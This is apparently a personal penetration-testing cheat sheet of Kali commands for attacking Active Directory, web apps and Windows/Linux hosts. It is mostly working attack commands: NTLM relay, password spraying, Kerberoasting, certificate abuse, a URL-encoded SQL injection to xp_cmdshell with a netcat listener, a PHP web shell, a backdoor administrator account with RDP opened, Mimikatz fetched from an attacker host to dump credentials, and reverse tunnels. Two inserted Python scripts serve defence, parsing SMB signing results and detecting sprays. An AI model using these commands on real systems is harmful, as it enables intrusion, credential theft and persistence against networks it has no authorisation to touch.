My gift for the universe

Kali Nathalie Notes


Setup

apt update
apt install setuptools wheel golang-go git jq eyewitness requests_toolbelt typer requests_ntlm --fix-missing
apt remove python3-httpx responder
python3 -m pip uninstall httpx --break-system-packages

# Binaries via Go
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest
go install github.com/lkarlslund/ldapnomnom@latest
go install github.com/ropnop/kerbrute@latest

# Tools
python3 -m pip install sprayhound --break-system-packages
git clone https://github.com/Macmod/godap && cd godap && go install .
echo 'export PATH=$PATH:/root/go/bin:/root/.local/bin' >> ~/.zshrc && source ~/.zshrc
pipx install git+https://github.com/lgandx/Responder.git
pipx install git+https://github.com/garrettfoster13/sccmhunter/

git clone https://github.com/lefayjey/linWinPwn && cd linWinPwn
pipx ensurepath
chmod +x install.sh && ./install.sh

# testssl
git clone --depth 1 https://github.com/testssl/testssl.sh.git --branch 3.3dev

# discord uploader (linux)
git clone https://github.com/fieu/discord.sh/
echo 'export WEBHOOK="https://discord.com/api/webhooks/..."' >> ~/.zshrc && source ~/.zshrc

Active Directory Assessment

Quick Checklist ✅

Checks:
- Use Responder
- Check for SMB signing not required (signing:False)
- Check for LDAP signing not enforced
- Check password policy
- Check Machine Account Quota
- Run Nessus and review vulns
- Eyewitness all web services
- Check all printers for LDAP and E-mail (SMTP) creds

No Creds:
- ldapnomnom or nxc smb <DC_IP> -u '' -p '' --users
- Check SMBs with Guest / without user
- Check AD login with Guest (godap)
- Fake Machine Creation via DHCP Poisoning
- Check FTP with anonymous:anonymous

Creds:
- Spray users with obtained Passwords!
- Try WinRM auth with each obtained user
- Fake Machine Creation via impacket-addcomputer
- Check SMBs with obtained users
- Kerberoasting & AS-REP Roasting (all ADs)
- Test user=pass with kerbrute
- Known vulns with netexec or linWinPwn
- Check ADCS
- Check Domain Users description
- Run BloodHound
- Run PingCastle (Windows)
- Run sccmhunter.py

Also:
- See: https://hideandsec.sh/books/cheatsheets-82c/page/active-directory
- See: https://orange-cyberdefense.github.io/ocd-mindmaps/img/mindmap_ad_dark_classic_2025.03.excalidraw.svg
- Video: https://youtu.be/b0lLxLJKaRs

Ping Castle (Windows Host)

.\PingCastle.exe --healthcheck --user "kali.nathalie@host.com" --password "pass" --server host.com

Responder

responder -I eth0 -wd
cat *SSP*.txt \
  | grep -vF '$' \
  | sort -u \
  | awk -F'::' '!seen[$1]++' \
> ntlmv2_ssp.txt

cat $(ls *NTLMv2*.txt | grep -v 'SSP') \
  | grep -vF '$' \
  | sort -u \
  | awk -F'::' '!seen[$1]++' \
> ntlmv2.txt

awk -F'::' 'NR==FNR { ssp[$1]=1; next } !ssp[$1]' ntlmv2_ssp.txt ntlmv2.txt > ntlmv2.tmp && mv ntlmv2.tmp ntlmv2.txt

Same de-duplication in Python (keeps the lines of the first file whose user is absent from the second):

#!/usr/bin/env python3
import sys

def users(path):
    s = set()
    with open(path, encoding="utf-8", errors="ignore") as f:
        for line in f:
            if "::" in line:
                u = line.split("::", 1)[0].strip()
                if u:
                    s.add(u)
    return s

def diff(bigger, smaller, out_path):
    existing = users(smaller)
    with open(bigger, encoding="utf-8", errors="ignore") as fin, \
         open(out_path, "w", encoding="utf-8", errors="ignore") as fout:
        for line in fin:
            if "::" in line:
                u = line.split("::", 1)[0].strip()
                if u not in existing:
                    fout.write(line)

if __name__ == "__main__":
    bigger = sys.argv[1]
    smaller = sys.argv[2]
    out_path = sys.argv[3] if len(sys.argv) > 3 else "ntlmv2_ssp_diff.txt"
    diff(bigger, smaller, out_path)

Printers

Xerox:
  admin:1111
  admin:admin
  admin:1234
HP OfficeJet Pro:
  Settings->Email Alerts->Email Server
RICOH:
  admin:<blank>
  Device Management->Configuration->Device Settings
    - Email
    - File Transfer
    - User Authentication Management
    - Administrator Authentication Management
    - LDAP Server
    - Kerberos Authentication
Zebra:
  Print Server Settings -> Print Server -> admin:1234
Lexmark:
  Settings->Security->Security Setup
  Settings->E-mail
    http://<ip>/webglue/content?c=%2FSettings%2FEmail
    http://<ip>/cgi-bin/dynamic/printer/config/net/email.html
DataMax:
  Nothing relevant

Check SMB and LDAP Signing

nxc smb smb-hosts.txt -u user -p pass -d domain
nxc ldap ldap-hosts.txt
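Added example (not from the gist): a Python triage script for the output of the nxc smb run above. It parses the (signing:...) and (SMBv1:...) flags nxc prints in each host banner into a remediation list, which is what ends up in the report; the banner lines embedded here are constructed samples.

```python
#!/usr/bin/env python3
"""Triage nxc/netexec SMB banner output into a remediation list.

Parses the '(signing:True|False)' and '(SMBv1:True|False)' flags that nxc
prints per host and reports which hosts still accept unsigned SMB sessions
(relay-able) or still speak SMBv1. Banner lines below are constructed.
"""
import json
import re
import sys
from dataclasses import dataclass

# Constructed sample of `nxc smb smb-hosts.txt` output (not real hosts).
SAMPLE_OUTPUT = """\
SMB         10.0.0.5        445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         10.0.0.21       445    FS01             [*] Windows Server 2016 Build 14393 x64 (name:FS01) (domain:corp.local) (signing:False) (SMBv1:True)
SMB         10.0.0.22       445    WS22             [*] Windows 10 Build 19041 x64 (name:WS22) (domain:corp.local) (signing:False) (SMBv1:False)
SMB         10.0.0.30       445    PRN01            [-] Connection Error: timed out
"""

# Only "[*]" banner lines carry the flags; error lines ("[-]") are skipped.
BANNER_RE = re.compile(
    r"^SMB\s+(?P<ip>\S+)\s+(?P<port>\d+)\s+(?P<host>\S+)\s+\[\*\].*?"
    r"\(signing:(?P<signing>True|False)\).*?\(SMBv1:(?P<smbv1>True|False)\)"
)


@dataclass(frozen=True)
class SmbHost:
    ip: str
    hostname: str
    signing: bool
    smbv1: bool


def parse_nxc_smb(text):
    """Return one SmbHost per banner line; non-banner lines are ignored."""
    hosts = []
    for line in text.splitlines():
        m = BANNER_RE.match(line)
        if not m:
            continue
        hosts.append(SmbHost(m["ip"], m["host"],
                             m["signing"] == "True", m["smbv1"] == "True"))
    return hosts


def remediation_report(hosts):
    """Group hosts by finding so each can go straight into the report."""
    return {
        "signing_not_required": sorted(h.ip for h in hosts if not h.signing),
        "smbv1_enabled": sorted(h.ip for h in hosts if h.smbv1),
    }


if __name__ == "__main__":
    # Pipe real nxc output in, or run without stdin to see the sample.
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_OUTPUT
    print(json.dumps(remediation_report(parse_nxc_smb(data)), indent=2))
```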

NTLM Relay

ADD computer: responder -I eth0 -Pdv; ntlmrelayx.py -t ldaps://10.200.85.10 -wh attacker-wpad --no-smb-server --add-computer
Get Hashes: responder -I eth0 -Pdv; ntlmrelayx.py -t ldap://<IP> -wh attacker-wpad -dh -smb2support --no-multirelay --keep-relaying
Get LDAP Shell: responder -I eth0 -Pdv; ntlmrelayx.py -t ldap://<IP> -wh attacker-wpad -smb2support -i

User Enumeration & Password Spraying

Blackbox username discovery:

wget https://github.com/danielmiessler/SecLists/raw/refs/heads/master/Usernames/xato-net-10-million-usernames.txt
mv xato-net-10-million-usernames.txt 10kk_usernames.txt
ldapnomnom --input 10kk_usernames.txt --output users_found.txt --dnsdomain domain.local --maxservers 32 --parallel 16

Password policy and spraying:

# Policy
netexec smb 10.100.207.24 -d domain.local -u user -p pass --pass-pol

# Spray (sprayhound + netexec filtering failures)
sprayhound -U users.txt --lower -d domain.local -dc 172.20.100.100
netexec smb 192.168.1.101 -u users.txt -p Summer18 --continue-on-success | grep -v 'STATUS_LOGON_FAILURE'

User = Pass quick check:

for i in $(cat users_found.txt); do echo "$i:$i"; done > useraspasswd.txt
kerbrute bruteforce useraspasswd.txt -d domain.local --dc 10.100.207.24 -t 5 --safe

Safe spray wrapper (limit lockouts):

#!/bin/bash
# safe-spray.sh
if [ "$#" -ne 4 ]; then
    echo "Usage: $0 <target> <users_file> <password> <lockout_limit>"
    echo "Example: $0 192.168.1.24 users.txt 'Password123' 10"
    exit 1
fi

TARGET="$1"; USERFILE="$2"; PASSWORD="$3"; LOCKOUT_LIMIT="$4"; LOCKED=0
# --line-buffered: without it grep block-buffers into the pipe and lockout lines arrive late
netexec smb "$TARGET" -u "$USERFILE" -p "$PASSWORD" --continue-on-success 2>&1 \
| grep --line-buffered -v 'STATUS_LOGON_FAILURE' | while read -r line; do
    echo "$line"
    if echo "$line" | grep -q "STATUS_ACCOUNT_LOCKED_OUT"; then
        LOCKED=$((LOCKED + 1))
        echo "[!] Lockout detected! Total: $LOCKED"
        if [ "$LOCKED" -ge "$LOCKOUT_LIMIT" ]; then
            echo "[!] Lockout limit reached ($LOCKED). Aborting!"
            pkill -f "netexec smb $TARGET"
            break
        fi
    fi
done
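Added example (not part of the gist), written from the blue-team side of the spraying above: the one-password-per-user pattern that sprayhound/netexec produce shows up in the DC's logon-failure events as a single source failing against many distinct accounts in a short window. The script below runs that detection over constructed Windows 4625/4624 event lines (the key=value line format is an assumption for the sample), counts lockouts and notes any success from the same source.

```python
#!/usr/bin/env python3
"""Detect password-spray patterns in Windows logon events.

Flags any source IP whose failed logons (EventID 4625) hit at least
MIN_USERS distinct accounts inside a sliding WINDOW, counts lockouts
(Status 0xC0000234) and lists accounts the same source later logged
into (EventID 4624). The log lines are constructed samples.
"""
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)
MIN_USERS = 5
LOCKED_OUT = "0xC0000234"

# Constructed sample: a spray from 10.0.0.99 plus an ordinary typo from 10.0.0.12.
SAMPLE_LOG = """\
2025-01-10T09:00:01Z EventID=4625 TargetUserName=alice IpAddress=10.0.0.99 Status=0xC000006D
2025-01-10T09:00:02Z EventID=4625 TargetUserName=bob IpAddress=10.0.0.99 Status=0xC000006D
2025-01-10T09:00:03Z EventID=4625 TargetUserName=carol IpAddress=10.0.0.99 Status=0xC000006D
2025-01-10T09:00:04Z EventID=4625 TargetUserName=dave IpAddress=10.0.0.99 Status=0xC000006D
2025-01-10T09:00:05Z EventID=4625 TargetUserName=erin IpAddress=10.0.0.99 Status=0xC000006D
2025-01-10T09:00:06Z EventID=4625 TargetUserName=frank IpAddress=10.0.0.99 Status=0xC0000234
2025-01-10T09:00:07Z EventID=4624 TargetUserName=grace IpAddress=10.0.0.99 Status=0x0
2025-01-10T09:05:00Z EventID=4625 TargetUserName=alice IpAddress=10.0.0.12 Status=0xC000006D
2025-01-10T09:05:30Z EventID=4625 TargetUserName=alice IpAddress=10.0.0.12 Status=0xC000006D
2025-01-10T11:00:00Z EventID=4625 TargetUserName=henry IpAddress=10.0.0.99 Status=0xC000006D
"""


def parse_event(line):
    """'<ISO timestamp> key=value ...' -> dict with a datetime under 'ts'."""
    ts_str, _, rest = line.partition(" ")
    fields = dict(kv.split("=", 1) for kv in rest.split())
    fields["ts"] = datetime.strptime(ts_str, "%Y-%m-%dT%H:%M:%SZ")
    return fields


def detect_sprays(log_text, window=WINDOW, min_users=MIN_USERS):
    """Return {ip: {"users": [...], "lockouts": n, "succeeded": [...]}}
    for every source that reaches min_users distinct failed accounts
    within `window`."""
    events = [parse_event(l) for l in log_text.splitlines() if l.strip()]
    events.sort(key=lambda e: e["ts"])
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["IpAddress"]].append(e)

    findings = {}
    for ip, evs in by_ip.items():
        failures = [e for e in evs if e["EventID"] == "4625"]
        best, start = set(), 0
        # Sliding window over the failures, tracking distinct target accounts.
        for end in range(len(failures)):
            while failures[end]["ts"] - failures[start]["ts"] > window:
                start += 1
            users = {e["TargetUserName"] for e in failures[start:end + 1]}
            if len(users) > len(best):
                best = users
        if len(best) >= min_users:
            findings[ip] = {
                "users": sorted(best),
                "lockouts": sum(1 for e in failures if e["Status"] == LOCKED_OUT),
                # A 4624 from the spraying source is the account to reset first.
                "succeeded": sorted({e["TargetUserName"] for e in evs
                                     if e["EventID"] == "4624"}),
            }
    return findings


if __name__ == "__main__":
    for ip, hit in detect_sprays(SAMPLE_LOG).items():
        print(f"[!] spray from {ip}: {len(hit['users'])} accounts, "
              f"{hit['lockouts']} lockouts, success on {hit['succeeded']}")
```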

AS-REP Roasting

nxc ldap 10.200.68.3 -u user -p 'pass' --asreproast ASREProastables.txt --kdcHost 10.200.68.3
GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -dc-ip 10.200.68.3 secura.yzx/charlotte:'Game2On4.!'

Kerberoasting

nxc ldap 10.200.68.3 -u user -p 'pass' -k --kerberoasting kerberoasting.hashes
GetUserSPNs.py -request -dc-ip 192.168.54.97 secura.yzx/charlotte:'Game2On4.!'
hashcat -m 13100 --force -a 0 hashes /usr/share/wordlists/rockyou.txt

ADCS / Certificates

certipy find -u 'user@domain.htb' -p '123' -dc-ip 10.22.20.121 -ns 10.22.20.121 -vulnerable -enabled -dns-tcp -output vulns.local
# ESC8 reference: https://www.hackingarticles.in/adcs-esc8-ntlm-relay-to-ad-cs-http-endpoints/

# Example ESC1-ish request (UPN abuse)
certipy req -username 'KaliPC$' -password 'Password#1' -ca AUTHORITY-CA -target authority.authority.htb -dc-ip 10.129.229.56 -template CorpVPN -upn administrator@authority.htb -debug

# Split PFX
certipy cert -pfx administrator.pfx -nokey -out user.crt
certipy cert -pfx administrator.pfx -nocert -out user.key

# Pass-the-Cert LDAP shell
python3 passthecert.py -action ldap-shell -crt user.crt -key user.key -domain authority.htb -dc-ip 10.129.229.56

SCCM

sccmhunter find -u kali.nathalie -p '123123' -d domain.com -dc-ip 10.200.68.3
sccmhunter smb -u kali.nathalie -p '123123' -d domain.com -dc-ip 10.200.68.3 -save

Check CVEs

unbuffer nxc smb ldap-servers.txt -M zerologon -M printnightmare -M smbghost -M ms17-010 -M coerce_plus | grep --color=never -Ev "ERROR|STATUS_ACCESS_DENIED"
nxc smb ldap-servers.txt -d domain -u 'user' -p 'pass' -M nopac -M ntlm_reflection -M spooler -M webdav

FTP anonymous auto check

# targets.txt is "ip port,port,..." (see Network Discovery); match port 21 exactly, not an IP octet
awk '{ n = split($2, p, ","); for (i = 1; i <= n; i++) if (p[i] == "21") { print $1; break } }' targets.txt > ftp-hosts.txt
while read host; do
    echo "===== $host ====="
    timeout 10 ftp -inv "$host" <<EOF
user anonymous anonymous@
ls
bye
EOF
    echo
done < ftp-hosts.txt

LDAP & Domain Enumeration

Create computer (requires rights):

impacket-addcomputer -computer-name 'KaliPC$' -computer-pass 'Password#1' -dc-host 10.129.229.56 'authority.htb/svc_ldap:lDaP_1n_th3_cle4r!'

List domains from a file of IPs:

#!/bin/bash
# list-domains.sh
ARQUIVO="$1"
[ ! -f "$ARQUIVO" ] && { echo "File '$ARQUIVO' not found!"; exit 2; }

while IFS= read -r ip || [ -n "$ip" ]; do
  [ -z "$ip" ] && continue
  echo "🔎 Checking $ip..."
  # anonymous base query; "DC=corp,DC=local" is rewritten to "corp.local"
  ldapsearch -x -H ldap://"$ip" -s base namingContexts 2>/dev/null | \
  awk '/^namingContexts: DC=/ { sub(/^namingContexts: DC=/, ""); gsub(/,DC=/, "."); print "   → " $0 }'
  echo
done < "$ARQUIVO"

godap (Guest / creds):

# No creds
godap IP

# DOMAIN\user
godap IP -u 'DOMAIN\user' -p 'Welcome123!'

# user@DOMAIN
godap IP -u 'user@DOMAIN' -p 'Senha'

bloodyAD:

Add User to Group:
bloodyAD -u <user> -p pass -d domain.htb --host 10.10.10.10 add groupMember 'service accounts' <user>
Set SPN:
bloodyAD -u <user> -p pass -d domain.htb --host 10.10.10.10 set object <user> servicePrincipalName -v 'http/whatever'
Shadow Credential:
bloodyAD -u <user> -p pass -d domain.htb --host 10.10.10.10 set owner <target_user> <user>
bloodyAD -u <user> -p pass -d domain.htb --host 10.10.10.10 add genericAll <target_user> <user>
certipy shadow auto -target 10.10.10.10 -u <user> -p pass -account <target_user>

Web Assessment

Checklist:

User Enum (login/register)
SSL/TLS
Password Recovery
Security Headers
Rate-Limit/CAPTCHA
Improper Error Handling
Directory Fuzzing and Wayback Machine
HTML Injection/XSS/SSTI
Password Policy
SQLI
CSRF
XSS (dangerouslySetInnerHTML, innerHTML, outerHTML, insertAdjacentHTML)
API and endpoints in JS

Build list of web hosts from Nmap outputs & screenshot with EyeWitness:

awk '
function out(){if(ip && port!=""){k=ip ":" port;if(!seen[k]){print k;seen[k]=1}}}
/^Nmap scan report for/ {gsub("[()]", "", $NF);ip=$NF;port=""}
/^[0-9]+\/tcp/ {
  split($1,p,"/");port="";
  if($2 ~ /open/) port=p[1];
  if(ip && port!="") for(i=3;i<=NF;i++) if(tolower($i) ~ /http/){out();break}
}
/http-title/ || /HTTP\/[0-9]\.[0-9]/ || /HTTP\/2/ || /Content-Type: text\/html/ || /<html[ >]/ {out()}
' *.txt > http-hosts.txt

httpx -l http-hosts.txt -o httpx-hosts.txt
eyewitness -f httpx-hosts.txt -d screen --delay 8

Basic Directory fuzzing

ffuf -w /usr/share/dirb/wordlists/directory-list-2.3-medium.txt -u http://192.168.159.120/FUZZ -mc 200-299,300-309,401,403,405,500 -c
python3 dirsearch.py -u 192.168.173.245

Advanced Directory fuzzing with ffuf (script):

#!/bin/bash
# run-ffuf.sh
if [ $# -ne 2 ]; then
  echo "Use: $0 <hosts_file> <wordlist>"
  exit 1
fi
HOSTS_FILE="$1"
WORDLIST="$2"
STATUSCODES="200-299,301,302,307,401,403,405,500"
USERAGENT="Mozilla/5.0 (Linux; Android 13; SM-G998B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Mobile Safari/537.36"

[ ! -f "$HOSTS_FILE" ] && { echo "Can't find '$HOSTS_FILE'!"; exit 2; }
[ ! -f "$WORDLIST" ] && { echo "Can't find '$WORDLIST'!"; exit 3; }

while IFS= read -r HOST || [ -n "$HOST" ]; do
  echo "[*] Running ffuf on $HOST/FUZZ"
  ffuf -w "$WORDLIST" -u "$HOST/FUZZ" -mc "$STATUSCODES" -c -H "User-Agent: $USERAGENT" -ac
done < "$HOSTS_FILE"

Mirror a directory listing (limit files <=10MB):

sudo apt install -y httrack
httrack 'http://172.21.101.25/global/' -O ./mirror-listagem "-*" "+http://172.21.101.25/global/*" "-*[>10240]"

Microsoft SQLI to RCE:

1'%3b%20EXEC%20sp_configure%20'show%20advanced%20options',1;RECONFIGURE;EXEC sp_configure%20'xp_cmdshell',1;RECONFIGURE;%20--
nc -vnlp 1337
1'%3b%20EXEC%20xp_cmdshell%20'powershell%20-e%20<BASE64 PAYLOAD HERE>'%20%3b%20--

First Access Assessment

Checklist:

Check "<Service Name/port> exploit RCE" on Google
Check "nc -vvv <host> <port>" for each weird service; Then try "help" or something like that
Check hacktricks for each port
Fuzzing all the web services
Make sure to fix the exploits, try different exploits, and change the LPORT to 443, 80 or 22 if it isn't working
Last option: Bruteforce

Network Discovery & Scanning

mkdir scan && cd scan
# Discover hosts from ranges
nmap -sn -T2 -PR -iL ranges.txt --excludefile exclude.txt -oG - | awk '/Status: Up/{print $2}' > hosts.txt

Masscan (full port sweep):

masscan -p1-65535 --rate=2000 -e eth0 -iL hosts.txt -oG nmap.gnmap

Nmap:

Slow(Real World):
nmap -p- -n -Pn -v -iL hosts.txt -oG nmap.gnmap -T1
Fast(CTF):
nmap -p- --min-rate 10000 -Pn -v -n -iL hosts.txt -oG nmap.gnmap
nmap -p- --min-rate 10000 -sU -Pn -v -n -iL hosts.txt -oG nmap.gnmap (if nothing relevant turned up on TCP)

Build targets.txt (ip ports):

awk '/Ports:/{ if ($1=="Host:") { ip=$2; start=5 } else if ($1=="Timestamp:"){ ip=$4; start=4 } gsub(/[()]/,"",ip); for(i=start;i<=NF;i++){ if ($i ~ /\/open\//){ gsub(/,$/,"",$i); split($i,a,"/"); ports[ip] = (ports[ip] ? ports[ip]","a[1] : a[1])}}} END{ for (ip in ports) print ip, ports[ip]}' nmap.gnmap | sort -V > targets.txt
mkdir -p output
while read -r ip ports; do
  ports="${ports#,}"   # strip a leading comma if present
  nmap -v -Pn -sV --script "default and safe and not intrusive and not brute and not broadcast" -p "$ports" "$ip" -oN "output/nmap_${ip}.txt"
done < targets.txt

PowerView (Windows PowerShell)

# Prep
RunWithRegistryNonAdmin.bat
. .\PowerView.ps1

# Forest domains
Get-ForestDomain -Verbose

# Users / Computers
Get-DomainUser     | Select-Object -ExpandProperty samaccountname
Get-DomainComputer | Select-Object -ExpandProperty dnshostname

# Domain Admins
Get-DomainGroupMember -Identity "Domain Admins"

# OUs
Get-DomainOU | Select-Object -ExpandProperty name

# Delegations
Get-DomainComputer -Unconstrained | Select-Object -ExpandProperty name
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth

# SIDs
Get-DomainSid; Get-DomainSid -Domain finance.corp

Windows Host Assessment

whoami
whoami /groups
whoami /priv
CHECK C:\Windows.old (dir C:\)
ipconfig /all
route print
netstat -ano
net localgroup Administrators
Get-LocalUser
Get-LocalGroup
Get-Process
cd C:\Users && tree . /f
Check C:\Users\<USER>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
WinPeas
Mimikatz
xampp pentest:
    check xampp\htdocs
    check C:\xampp\mysql\bin\mysql.exe -u <username> -p<password> <db>
    check `icacls htdocs` for who can write (look for NT AUTHORITY\SYSTEM / Everyone), then: Set-Content -path 0xdf.php -Value '<?php system($_REQUEST["cmd"]); ?>'
    Get-ChildItem C:\xampp -Recurse -File | Select-String 'administrator' | Select-Object -Unique Path
    Get-ChildItem C:\xampp -Recurse -File | Select-String 'password'      | Select-Object -Unique Path

Credentials Checklist ✅

nxc winrm hosts.txt -u users.txt -p <pass> --continue-on-success
nxc rdp hosts.txt -u users.txt -p <pass> --continue-on-success
nxc smb hosts.txt -u users.txt -p <pass> --continue-on-success
nxc ldap hosts.txt -u users.txt -p <pass> --continue-on-success
nxc mssql hosts.txt -u users.txt -p <pass> --continue-on-success

Linux Host Assessment

uname -a
sudo -l
linpeas
pspy
reuse SSH credentials
check /opt
check /home/<USER>/files
Try "su <user>" with each obtained password

DirtyPipe:
https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits

Fix Terrible Potato Shell

net user kalihacker kalihacker123 /add & net localgroup administrators kalihacker /add & net localgroup "WinRMRemoteWMIUsers__" kalihacker /add & net localgroup "Remote Management Users" kalihacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable
nxc winrm 192.168.238.170 -u 'kalihacker' -p 'kalihacker123' --local-auth
or
net user administrator kalihacker123

Enable WinRM (probably via RDP)

Enable-PSRemoting -Force

List files recursively (Windows):

gci -recurse

Fix Windows→Linux line endings:

dos2unix file.sh

Linux secret hunting (find/grep):

find / -type f -readable 2>/dev/null | while read -r file; do
  grep -IEni --color=always 'password|passwd|pwd|user(name)?|login|credential|secret|token|key|auth' "$file" 2>/dev/null \
  | cut -c -300 | sed "s|^|$file:|"
done | tee resultados_busca.txt

# Extras
trufflehog
rg -i -F --hidden password -M 1024

Credential Harvesting & Cracking

Mimikatz (Windows PowerShell)

# Reference:
# https://tools.thehacker.recipes/mimikatz/modules
iwr('http://192.168.49.56:8000/Invoke-MimikatzPatched.ps1') -OutFile mimi.ps1
Set-ExecutionPolicy -ExecutionPolicy bypass -Scope LocalMachine -Force
Import-Module .\mimi.ps1 -Force
Invoke-Mimikatz -DumpCreds
Invoke-Mimikatz -Command '"token::elevate" "privilege::debug" "sekurlsa::logonpasswords"'
Invoke-Mimikatz -Command '"token::elevate" "vault::cred /patch"'
Invoke-Mimikatz -Command '"token::elevate" "sekurlsa::credman"'
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
Invoke-Mimikatz -Command '"token::elevate" "lsadump::cache /kiwi"'
Invoke-Mimikatz -Command '"token::elevate" "lsadump::cache /user:MEDTECH\joe /kiwi"' #For MsCacheV2
Invoke-Mimikatz -Command '"token::elevate" "lsadump::secrets"'

# CHANGE ARCHITECTURE 32 TO 64:
& "$env:WINDIR\Sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -NoExit

Credential Dumping via netexec/secretdump

nxc smb 192.168.238.171 -u kalihacker -p kalihacker123 --local-auth --sam
nxc smb 192.168.238.171 -u kalihacker -p kalihacker123 --local-auth --lsa
impacket-secretsdump 'kalihacker':'kalihacker123'@192.168.238.171

WinPeas:

iwr('http://192.168.45.245:8000/winPEASx64.exe') -OutFile winpeas.exe
.\winpeas.exe > winpeas.txt

Fix colors:
sed $'s/\u2190/\e/g' winpeas.txt

Hashcat (NTLMv2-SSP):

.\hashcat.exe -m 5600 -a 0 .\techboss.hash rockyou2021.txt

SMB Enumeration & Looting

Small Environments like CTFs

nxc smb fluffy.htb -u j.fleischman -p 'J0elTHEM4n1990!' --shares
smbclient  '//10.10.11.69/IT' -U 'j.fleischman%J0elTHEM4n1990!'

MANSPIDER (no download, just parse):

pipx install git+https://github.com/blacklanternsecurity/MANSPIDER
cd /root/.local/share/pipx/venvs/man-spider/lib/python3.13/site-packages/man_spider/lib/parser
# (optional tweak) edit parser.py changing 5 to 50
cat targets.txt | grep -w 445 | awk '{print $1}' > smb-hosts.txt
manspider -d domain.local -u user -p pass smb-hosts.txt -t 10 -c passw key login user -e bat com vbs ps1 psd1 psm1 pem key rsa pub reg txt cfg conf config xml cspkg publishsettings json cnf sql -n 2>&1 | tee -a smb_complete_output.txt
awk '!seen[$0]++' smb_complete_output.txt > smb_clean.txt

MANSPIDER (downloading):

manspider -d domain.local -u user -p pass servers.txt -t 10 -c passw key login user -e bat com vbs ps1 psd1 psm1 pem key rsa pub reg txt cfg conf config xml cspkg publishsettings json cnf sql 2>&1

cd /root/.manspider
zip loot.zip -r loot
python3 -m http.server

Interesting queries:

"net use "
"-password"
"AccountPassword"
"password:"
"/user:"

SMB mget (interactive client):

recurse ON
prompt OFF
mget *

Pivoting & Tunneling (All in one place)

Meterpreter-based

# In Meterpreter
ipconfig   # collect network info
background
# In msfconsole
use post/multi/manage/autoroute
set SUBNET 172.31.43.0
set session 1
exploit

use auxiliary/server/socks_proxy
set SRVHOST 0.0.0.0
set SRVPORT 8080
route add 172.31.43.223 255.255.240.0 1
run
# /etc/proxychains.conf  (disable proxy_dns), then on your host:
socks4 127.0.0.1 8080
proxychains nmap -sV -Pn -v 172.31.43.223

Chisel (Reverse SOCKS)

# Attacker
./chisel server -p 8081 --reverse
# Target
./chisel client -v 10.10.14.2:8081 R:1080:socks
# Then use proxychains

Ligolo

Ref: https://software-sinner.medium.com/how-to-tunnel-and-pivot-networks-using-ligolo-ng-cf828e59e740
Download: https://github.com/nicocha30/ligolo-ng/releases?source=post_page-----cf828e59e740---------------------------------------
Agent: Target machine
Proxy: Attacker machine (Yours)

sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert -laddr 0.0.0.0:443
iwr('http://192.168.45.245:8000/ligolo/agent.exe') -OutFile agent.exe
.\agent.exe -connect 192.168.45.245:443 -ignore-cert
session
start
ifconfig
sudo ip route add 172.16.159.0/24 dev ligolo

Shutdown:
sudo ip route del 172.16.159.0/24 dev ligolo
sudo ip link set ligolo down
sudo ip tuntap del dev ligolo mode tun

Double connection:
listener_add --addr 0.0.0.0:8000 --to 127.0.0.1:8000

Tailscale (ad-hoc overlay)

curl -fsSL https://tailscale.com/install.sh | sh
sudo systemctl enable --now tailscaled
sudo tailscale up
ssh -D 1080 user@100.101.102.103

SSH Remote Port-Forward

nohup ssh -R 1081 -o StrictHostKeyChecking=no tunel@10.10.14.2 2>/dev/null &

Forward only one port via SSH

$ ssh -i oscpb dev@192.168.183.150 -L 9000:127.0.0.1:8000
$ nc 127.0.0.1 9000

Remote Execution & Lateral Movement

# WinRM
Enter-PSSession -ComputerName tech-dc          # with current ticket/creds
# Or with creds
$pw = ConvertTo-SecureString -AsPlainText -Force -String 'SENHA-SENHA'
$cred = New-Object System.Management.Automation.PSCredential -ArgumentList "Domain\User",$pw
Enter-PSSession -ComputerName localhost -Credential $cred
Enter-PSSession -Id 1
Invoke-Command -ScriptBlock { whoami } -Credential $cred -ComputerName localhost
:: CMD WinRM
winrs -r:tech-dc cmd
winrs -r:dcorp-mgmt "cmd /c whoami"
# PsExec / Impacket
PsExec.exe \\srv.domain.local cmd
psexec.py Domain/user:pass@host <command>
psexec.py Domain/user@host     # will spawn a shell
# RDP
mstsc.exe
xfreerdp3 /u:yoshi /p:'Mushroom!' /v:172.16.143.82
rdesktop 172.16.143.82 -u yoshi -d medtech.com 
MSSQL

Cheat Sheet:
https://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet

Connect:
mssqlclient.py DOMAIN/username@[Target_IP]
mssqlclient.py DOMAIN/web_svc@10.10.129.142 -windows-auth

Exec:
EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;
EXEC xp_cmdshell 'powershell -e <BASE64 PAYLOAD HERE>';

Find passwords:
